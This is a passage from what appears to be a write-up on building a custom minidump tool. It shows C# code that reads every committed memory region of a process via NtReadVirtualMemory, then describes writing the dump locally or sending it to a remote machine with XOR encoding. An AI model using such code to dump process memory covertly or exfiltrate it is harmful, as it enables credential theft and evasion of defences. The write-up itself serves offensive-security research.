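                   (IntPtr)Marshal.SizeOf<MEMORY_BASIC_INFORMATION>(), out _) == 0)
        {
            if (mbi.State == MEM_COMMIT && mbi.Protect != PAGE_NOACCESS)
            {
                var bytes = new byte[(long)mbi.RegionSize];
                NtReadVirtualMemory(hProcess, mbi.BaseAddress, bytes, mbi.RegionSize, out _);
                regions.Add((mbi.BaseAddress, mbi.RegionSize, bytes)); // one Memory64List entry
            }
            address = (IntPtr)((long)mbi.BaseAddress + (long)mbi.RegionSize); // next region
        }
        return regions;
    }
}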


G. Creating the Minidump file

After the previous steps we have everything necessary to create the Minidump file. We can create a file locally or send the bytes to a remote machine, with the option of encoding or encrypting the bytes beforehand. Some of these possibilities are implemented in the delegates branch, where the file created locally can be XOR-encoded, and in the remote branch, where the file can be XOR-encoded before being sent to a remote machine.